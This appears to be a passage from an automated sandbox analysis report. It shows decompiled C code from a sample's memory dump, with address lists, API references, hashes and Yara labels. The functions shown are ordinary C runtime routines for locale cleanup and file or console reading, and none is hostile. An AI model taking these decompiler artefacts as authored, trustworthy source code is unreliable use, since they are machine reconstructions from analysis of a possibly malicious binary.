Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE43
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE55
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE67
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE79
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE8B
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE9D
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCEAF
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCEC1
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCED3

_free.LIBCMT ref: 004BDA84

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004BDAA6
_free.LIBCMT ref: 004BDABB
_free.LIBCMT ref: 004BDAC6
_free.LIBCMT ref: 004BDAE8
_free.LIBCMT ref: 004BDAFB
_free.LIBCMT ref: 004BDB09
_free.LIBCMT ref: 004BDB14
_free.LIBCMT ref: 004BDB4C
_free.LIBCMT ref: 004BDB53
_free.LIBCMT ref: 004BDB70
_free.LIBCMT ref: 004BDB88

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 414be654a2f0fb56b3e1cf125740efc78b3658e506fb9c3ebd9cd1fa168eb216
Instruction ID: ea171fb04e103e79ad14022c68cc06d52c79bff9a145cefa33e706fbd9c84d7e
Opcode Fuzzy Hash: 414be654a2f0fb56b3e1cf125740efc78b3658e506fb9c3ebd9cd1fa168eb216
Instruction Fuzzy Hash: A8319E31A083009FDB21AA3AD945BE7B3E8EF44354F1545AFE458D7255EB78BC809B38

Uniqueness

Uniqueness Score: -1.00%

Function 004BCEDC, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004BCEDC(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				char* _t225;
				signed int _t226;
				signed int _t230;
				signed int _t231;
				intOrPtr _t232;
				void* _t233;
				void* _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				char* _t256;

				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t233 = E004B2F72(0, 1, 0x50);
					_v8 = _t233;
					E004B2FCF(0);
					if(_t233 != 0) {
						_t226 = E004B2F72(0, 1, 4);
						_v12 = _t226;
						E004B2FCF(0);
						if(_t226 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x4eb098, _t213 << 2);
								L25:
								_t235 = _v8;
								_t230 = _v16;
								 *_t235 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t235 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t235 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t235 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t230 != 0) {
									 *_t230 = 1;
								}
								goto L27;
							}
							_t231 = E004B2F72(0, 1, 4);
							_v16 = _t231;
							E004B2FCF(0);
							if(_t231 != 0) {
								_t232 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t233 + 0xc; // 0xc
								_t236 = E004BAC52(_t210, _t232, _t233);
								_t237 = _t236 | E004BAC52(_t210, _t232, _t236,  &_v28, 1, _t232, 0x14, _v8 + 0x10,  &_v28);
								_t238 = _t237 | E004BAC52(_t210, _t232, _t237,  &_v28, 1, _t232, 0x16, _v8 + 0x14, 1);
								_t239 = _t238 | E004BAC52(_t210, _t232, _t238,  &_v28, 1, _t232, 0x17, _v8 + 0x18, _t232);
								_v20 = _v8 + 0x1c;
								_t240 = _t239 | E004BAC52(_t210, _t232, _t239,  &_v28, 1, _t232, 0x18, _v8 + 0x1c, 0x15);
								_t241 = _t240 | E004BAC52(_t210, _t232, _t240,  &_v28, 1, _t232, 0x50, _v8 + 0x20, _t14);
								_t242 = _t241 | E004BAC52(_t210, _t232, _t241);
								_t243 = _t242 | E004BAC52(_t210, _t232, _t242,  &_v28, 0, _t232, 0x1a, _v8 + 0x28,  &_v28);
								_t244 = _t243 | E004BAC52(_t210, _t232, _t243,  &_v28, 0, _t232, 0x19, _v8 + 0x29, 1);
								_t245 = _t244 | E004BAC52(_t210, _t232, _t244,  &_v28, 0, _t232, 0x54, _v8 + 0x2a, _t232);
								_t246 = _t245 | E004BAC52(_t210, _t232, _t245,  &_v28, 0, _t232, 0x55, _v8 + 0x2b, 0x51);
								_t247 = _t246 | E004BAC52(_t210, _t232, _t246,  &_v28, 0, _t232, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t248 = _t247 | E004BAC52(_t210, _t232, _t247);
								_t249 = _t248 | E004BAC52(_t210, _t232, _t248,  &_v28, 0, _t232, 0x52, _v8 + 0x2e,  &_v28);
								_t250 = _t249 | E004BAC52(_t210, _t232, _t249,  &_v28, 0, _t232, 0x53, _v8 + 0x2f, 0);
								_t251 = _t250 | E004BAC52(_t210, _t232, _t250,  &_v28, 2, _t232, 0x15, _v8 + 0x38, _t232);
								_t252 = _t251 | E004BAC52(_t210, _t232, _t251,  &_v28, 2, _t232, 0x14, _v8 + 0x3c, 0x57);
								_t253 = _t252 | E004BAC52(_t210, _t232, _t252,  &_v28, 2, _t232, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t232);
								_t254 = _t253 | E004BAC52(_t210, _t232, _t253);
								_t255 = _t254 | E004BAC52(_t210, _t232, _t254,  &_v28, 2, _t232, 0x50, _v8 + 0x48,  &_v28);
								if((E004BAC52(_t210, _t232, _t255,  &_v28, 2, _t232, 0x51, _v8 + 0x4c, 2) | _t255) == 0) {
									_t225 =  *_v20;
									while( *_t225 != 0) {
										_t195 =  *_t225;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t256 = _t225;
											do {
												 *_t256 =  *((intOrPtr*)(_t256 + 1));
												_t256 = _t256 + 1;
											} while ( *_t256 != 0);
										} else {
											 *_t225 = _t195 - 0x30;
											L17:
											_t225 = _t225 + 1;
										}
									}
									goto L25;
								}
								E004BCDDE(_v8);
								E004B2FCF(_v8);
								E004B2FCF(_v12);
								E004B2FCF(_v16);
								goto L4;
							}
							E004B2FCF(_t233);
							E004B2FCF(_v12);
							L7:
							goto L4;
						}
						E004B2FCF(_t233);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t230 = 0;
					_v12 = 0;
					_t235 = 0x4eb098;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E004B2FCF( *(_t210 + 0x88));
							E004B2FCF( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t230;
					 *(_t210 + 0x88) = _t235;
					return 0;
				}
			}

0x004bcee5
0x004bceec
0x004bceef
0x004bcef2
0x004bcefb
0x004bcf1d
0x004bcf21
0x004bcf24
0x004bcf2e
0x004bcf41
0x004bcf45
0x004bcf48
0x004bcf52
0x004bcf64
0x004bd1fa
0x004bd1fb
0x004bd1fd
0x004bd205
0x004bd209
0x004bd20e
0x004bd219
0x004bd225
0x004bd231
0x004bd23d
0x004bd243
0x004bd247
0x004bd249
0x004bd249
0x00000000
0x004bd247
0x004bcf73
0x004bcf77
0x004bcf7a
0x004bcf84
0x004bcf98
0x004bcf9e
0x004bcfb3
0x004bcfc7
0x004bcfde
0x004bcff8
0x004bd000
0x004bd012
0x004bd029
0x004bd040
0x004bd05a
0x004bd071
0x004bd088
0x004bd09f
0x004bd0b9
0x004bd0d0
0x004bd0e7
0x004bd0fe
0x004bd118
0x004bd12f
0x004bd146
0x004bd14e
0x004bd14f
0x004bd151
0x004bd15d
0x004bd177
0x004bd193
0x004bd1c1
0x004bd1d4
0x004bd1c5
0x004bd1c9
0x004bd1dd
0x00000000
0x00000000
0x004bd1df
0x004bd1e1
0x004bd1e4
0x004bd1e6
0x004bd1e9
0x004bd1cf
0x004bd1d1
0x004bd1d3
0x004bd1d3
0x004bd1d3
0x004bd1c9
0x00000000
0x004bd1d9
0x004bd199
0x004bd19f
0x004bd1a8
0x004bd1b1
0x00000000
0x004bd1b6
0x004bcf87
0x004bcf90
0x004bcf5a
0x00000000
0x004bcf5a
0x004bcf55
0x00000000
0x004bcf55
0x004bcf30
0x00000000
0x004bcf05
0x004bcf05
0x004bcf07
0x004bcf0a
0x004bd24b
0x004bd24b
0x004bd253
0x004bd255
0x004bd255
0x004bd25d
0x004bd262
0x004bd266
0x004bd26e
0x004bd276
0x004bd27c
0x004bd266
0x004bd280
0x004bd285
0x004bd28b
0x00000000
0x004bd28b

APIs

_free.LIBCMT ref: 004BCF24
_free.LIBCMT ref: 004BCF48
_free.LIBCMT ref: 004BCF55
_free.LIBCMT ref: 004BCF7A
_free.LIBCMT ref: 004BCF87
_free.LIBCMT ref: 004BCF90
_free.LIBCMT ref: 004BD26E
_free.LIBCMT ref: 004BD276

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 60bfcd6df8605fe5ed4878f4d10e6d0750fb59e4e33e636ece81b8e8ea909c17
Instruction ID: 88ec5743d30fd5a22a257532df4467679931d779ffe61120a42249d80850000e
Opcode Fuzzy Hash: 60bfcd6df8605fe5ed4878f4d10e6d0750fb59e4e33e636ece81b8e8ea909c17
Instruction Fuzzy Hash: BEC13571D40204ABDB20DFA9CC83FEA77F8AB44704F14416AFA05EB282E674DD519B75

Uniqueness

Uniqueness Score: -1.00%

Function 004B8B2C, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004B8B2C(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E004A965B();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E004A966E())) = 9;
						L59:
						_t145 = E004A5E77();
						goto L60;
					}
					__eflags = _t213 -  *0x4ee918; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x4ee718 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E004B3009(_t224, _t158);
								E004B2FCF(0);
								E004B2FCF(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E004B907F(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x4ee718 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x4ee718 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x4ee718 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x4ee718 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x4ee718 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x4ee718 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x4ee718 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E004C0EC7(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E004A9638(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E004A966E())) = 9;
											 *(E004A965B()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x4ee718 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E004B8688();
												} else {
													_t176 = E004B8998();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E004B8848(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x4ee718 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t115 =  &_v16; // 0xa
									_t184 = ReadConsoleW(_v32, _v12,  *_t115 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E004A966E())) = 0xc;
									 *(E004A965B()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004B2FCF(_t246);
									return _t242;
								}
							}
							L15:
							 *(E004A965B()) =  *_t206 & _t246;
							 *((intOrPtr*)(E004A966E())) = 0x16;
							E004A5E77();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E004A965B()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E004A966E())) = 0x16;
					goto L59;
				} else {
					 *(E004A965B()) =  *_t212 & 0x00000000;
					_t145 = E004A966E();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x004b8b35
0x004b8b3c
0x004b8b56
0x004b8b58
0x004b8ec0
0x004b8ec0
0x004b8ec5
0x004b8ec5
0x004b8ecd
0x004b8ed3
0x004b8ed3
0x00000000
0x004b8ed3
0x004b8b5e
0x004b8b64
0x00000000
0x00000000
0x004b8b6c
0x004b8b78
0x004b8b7b
0x004b8b7e
0x004b8b81
0x004b8b88
0x004b8b8b
0x004b8b8f
0x004b8b92
0x004b8b95
0x00000000
0x00000000
0x004b8b9b
0x004b8b9e
0x004b8ba4
0x004b8bbe
0x004b8bc0
0x004b8ebc
0x00000000
0x004b8ebc
0x004b8bc6
0x004b8bca
0x00000000
0x00000000
0x004b8bd0
0x004b8bd4
0x00000000
0x00000000
0x004b8bdb
0x004b8bdf
0x004b8be2
0x004b8be5
0x004b8bea
0x004b8bea
0x004b8bed
0x004b8c0a
0x004b8c0f
0x004b8c11
0x004b8c13
0x004b8c33
0x004b8c34
0x004b8c36
0x004b8c39
0x004b8c3b
0x004b8c3d
0x004b8c3f
0x004b8c3f
0x004b8c4a
0x004b8c4c
0x004b8c53
0x004b8c58
0x004b8c5b
0x004b8c5e
0x004b8c60
0x004b8c85
0x004b8c8a
0x004b8c91
0x004b8c94
0x004b8c97
0x004b8c9b
0x004b8c9d
0x004b8ca1
0x004b8ca3
0x004b8ca6
0x004b8ca9
0x004b8cab
0x004b8cae
0x004b8cb5
0x004b8cb8
0x004b8cbd
0x004b8cc0
0x004b8cc9
0x004b8ccd
0x004b8cd0
0x004b8cd3
0x004b8cd6
0x004b8cdc
0x004b8cde
0x004b8ce7
0x004b8cea
0x004b8ced
0x004b8cf0
0x004b8cf1
0x004b8cf5
0x004b8cfb
0x004b8d05
0x004b8d0a
0x004b8d1a
0x004b8d1e
0x004b8d21
0x004b8d23
0x004b8d25
0x004b8d27
0x004b8d29
0x004b8d31
0x004b8d32
0x004b8d35
0x004b8d38
0x004b8d39
0x004b8d3f
0x004b8d49
0x004b8d51
0x004b8d54
0x004b8d60
0x004b8d64
0x004b8d67
0x004b8d69
0x004b8d6b
0x004b8d6d
0x004b8d6f
0x004b8d77
0x004b8d78
0x004b8d7b
0x004b8d7e
0x004b8d7e
0x004b8d7f
0x004b8d85
0x004b8d8f
0x004b8d8f
0x004b8d6d
0x004b8d69
0x004b8d54
0x004b8d27
0x004b8d23
0x004b8d0a
0x004b8cde
0x004b8cd6
0x004b8d95
0x004b8d9b
0x004b8d9d
0x004b8e10
0x004b8e10
0x004b8e14
0x004b8e24
0x004b8e2a
0x004b8e2c
0x004b8e88
0x004b8e88
0x004b8e90
0x004b8e91
0x004b8e93
0x004b8eac
0x004b8eaf
0x004b8dec
0x004b8ded
0x00000000
0x004b8df2
0x004b8eb5
0x00000000
0x004b8eb5
0x004b8e9a
0x004b8ea5
0x00000000
0x004b8ea5
0x004b8e2e
0x004b8e31
0x004b8e34
0x00000000
0x00000000
0x004b8e36
0x004b8e36
0x004b8e39
0x004b8e3c
0x004b8e3f
0x004b8e46
0x004b8e4b
0x004b8e4d
0x004b8e51
0x004b8e6c
0x004b8e70
0x004b8e71
0x004b8e74
0x004b8e75
0x004b8e81
0x004b8e77
0x004b8e77
0x004b8e77
0x004b8e53
0x004b8e53
0x004b8e53
0x004b8e5e
0x004b8e63
0x004b8e66
0x004b8e66
0x00000000
0x004b8e4b
0x004b8da2
0x004b8da5
0x004b8dac
0x004b8db1
0x00000000
0x00000000
0x004b8dba
0x004b8dc0
0x004b8dc2
0x00000000
0x00000000
0x004b8dc4
0x004b8dc8
0x00000000
0x00000000
0x004b8dd0
0x004b8ddc
0x004b8de2
0x004b8de4
0x004b8e08
0x004b8e0b
0x00000000
0x004b8e0b
0x004b8de6
0x00000000
0x004b8c62
0x004b8c67
0x004b8c72
0x004b8df3
0x004b8df3
0x004b8df3
0x004b8df6
0x004b8df7
0x00000000
0x004b8dff
0x004b8c60
0x004b8c15
0x004b8c1a
0x004b8c21
0x004b8c27
0x00000000
0x004b8c27
0x004b8bef
0x004b8bf2
0x004b8bfc
0x004b8bfc
0x004b8bff
0x004b8c02
0x00000000
0x004b8c02
0x004b8bf6
0x004b8bf8
0x004b8bfa
0x00000000
0x00000000
0x00000000
0x004b8bfa
0x004b8ba6
0x004b8bab
0x004b8bb3
0x00000000
0x004b8b3e
0x004b8b43
0x004b8b46
0x004b8b4b
0x004b8ed8
0x00000000
0x004b8ed8

Strings

, xrefs: 004B8DD0, 004B8DD5

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: b93778e46181107fc3c6e2ac5e2aef817999bea28431571dfd27f43e17552d41
Instruction ID: d5b9adcafe5bfc15190d9af14687e61e56e9f6713fc921f339dbd42edafeea13
Opcode Fuzzy Hash: b93778e46181107fc3c6e2ac5e2aef817999bea28431571dfd27f43e17552d41
Instruction Fuzzy Hash: 3BC1D674904249AFDB11DFA9C841BEE7BB9AF1A300F14019EE504AB392CB389D41CB79

Uniqueness

Uniqueness Score: -1.00%

Function 004BD301, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004BD301(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				char* _t122;
				signed int _t126;
				intOrPtr* _t131;
				void* _t132;
				intOrPtr* _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				char* _t138;

				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E004B2F72(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t131 = E004B3009(0, 4);
						_t126 = 0;
						_v12 = _t131;
						E004B2FCF(0);
						_pop(_t107);
						if(_t131 != 0) {
							 *_t131 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t132 = _v8;
								_t57 =  *0x4eb098; // 0x4eb090
								 *_t132 = _t57;
								_t58 =  *0x4eb09c; // 0x4ee440
								 *((intOrPtr*)(_t132 + 4)) = _t58;
								_t59 =  *0x4eb0a0; // 0x4ee440
								 *((intOrPtr*)(_t132 + 8)) = _t59;
								_t60 =  *0x4eb0c8; // 0x4eb094
								 *((intOrPtr*)(_t132 + 0x30)) = _t60;
								_t61 =  *0x4eb0cc; // 0x4ee444
								 *((intOrPtr*)(_t132 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t126 != 0) {
									 *_t126 = 1;
								}
								goto L21;
							}
							_t133 = E004B3009(_t107, 4);
							_v20 = _t133;
							E004B2FCF(0);
							if(_t133 == 0) {
								L11:
								E004B2FCF(_v8);
								E004B2FCF(_v12);
								return _v16;
							}
							_push(_v8);
							 *_t133 = 0;
							_t127 =  *((intOrPtr*)(_t100 + 0xb0));
							_t134 = L004BAC52(_t100,  *((intOrPtr*)(_t100 + 0xb0)), _t133);
							_t135 = _t134 | L004BAC52(_t100,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
							_v16 = _v8 + 8;
							_t136 = _t135 | L004BAC52(_t100, _t127, _t135,  &_v28, 1, _t127, 0x10, _v8 + 8, 1);
							_t137 = _t136 | L004BAC52(_t100, _t127, _t136,  &_v28, 2, _t127, 0xe, _v8 + 0x30, _t127);
							if((L004BAC52(_t100, _t127, _t137,  &_v28, 2, _t127, 0xf, _v8 + 0x34, 0xe) | _t137) == 0) {
								_t122 =  *_v16;
								while( *_t122 != 0) {
									_t92 =  *_t122;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t138 = _t122;
										do {
											 *_t138 =  *((intOrPtr*)(_t138 + 1));
											_t138 = _t138 + 1;
										} while ( *_t138 != 0);
									} else {
										 *_t122 = _t92 - 0x30;
										L16:
										_t122 = _t122 + 1;
									}
								}
								_t126 = _v20;
								_t132 = _v8;
								goto L19;
							}
							E004BD298(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E004B2FCF(_v8);
						return 1;
					}
					return 1;
				} else {
					_t126 = 0;
					_v12 = 0;
					_t132 = 0x4eb098;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E004B2FCF( *((intOrPtr*)(_t100 + 0x7c)));
							E004B2FCF( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t126;
					 *(_t100 + 0x88) = _t132;
					return 0;
				}
			}

0x004bd30a
0x004bd311
0x004bd314
0x004bd31d
0x004bd33c
0x004bd33f
0x004bd344
0x004bd34b
0x004bd35e
0x004bd35f
0x004bd368
0x004bd36a
0x004bd36d
0x004bd370
0x004bd376
0x004bd379
0x004bd38c
